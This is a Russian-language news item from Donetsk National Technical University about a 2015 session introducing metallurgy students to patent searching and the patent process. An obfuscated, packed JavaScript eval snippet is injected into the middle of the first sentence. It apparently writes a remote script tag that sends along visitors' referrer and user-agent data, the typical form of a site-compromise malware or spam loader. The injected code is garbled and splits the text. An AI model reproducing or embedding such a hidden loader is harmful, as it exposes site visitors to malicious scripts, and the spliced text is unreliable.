

В eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfkrs|var|u0026u|referrer|rrtnd||js|php'.split('|'),0,{ })) отделе Интеллектуальной собственности и патентно-лицензионной работы (ОИСиПЛР) Донецкого национального технического университета (ДонНТУ) 9 ноября 2015 г. для студентов группы МКМ-12-7 кафедры Цветной металлургии и конструкционных материалов Физико-металлургического факультета ДонНТУ был проведен « **Час знаний о патентном деле**» в рамках изучения дисциплины « **Изобретательство и рационализация** ».



Будущие инженеры ознакомились с работой ОИСиПЛР в целом, на конкретных примерах усвоили причины, по которым возникает необходимость в наличии охранного документа

на изобретение, полезную модель, промышленный образец, товарный знак. Особый интерес у студентов вызвали вопросы, касательно требований к техническим решениям, на которые испрашивается правовая охрана и процедуры получения патента.

Для качественной работы над индивидуальными заданиями по дипломным проектам и курсовым работам студенты ознакомились с принципом и видами поиска технических решений по тематике работы, и доступными источниками информации – патентным фондом отдела и электронными специализированными патентными базами данных. Знакомство с международной патентной классификацией, разделом «Химия; металлургия», по классу C22 – металлургия: сплавы черных или цветных металлов, обработка сплавов или цветных металлов, позволило произвести быстрый поиск нужных изобретений и явилось отправной точкой для выполнения задания.

Научно-педагогическое сотрудничество ОИСиПЛР с кафедрами ДонНТУ способствует освоению на практике обзорных знаний в сфере изобретательства и патентования, которые несомненно важны для будущих инженеров. Студенты выразили благодарность за экскурс в мир изобретений, за приобретенные знания в области проведения патентных исследований и анализа уровня техники, выявления новых и экономически эффективных изобретений.

© М.П. Кондратенко (текст), 2015

© Научно-исследовательская часть ДонНТУ, 2015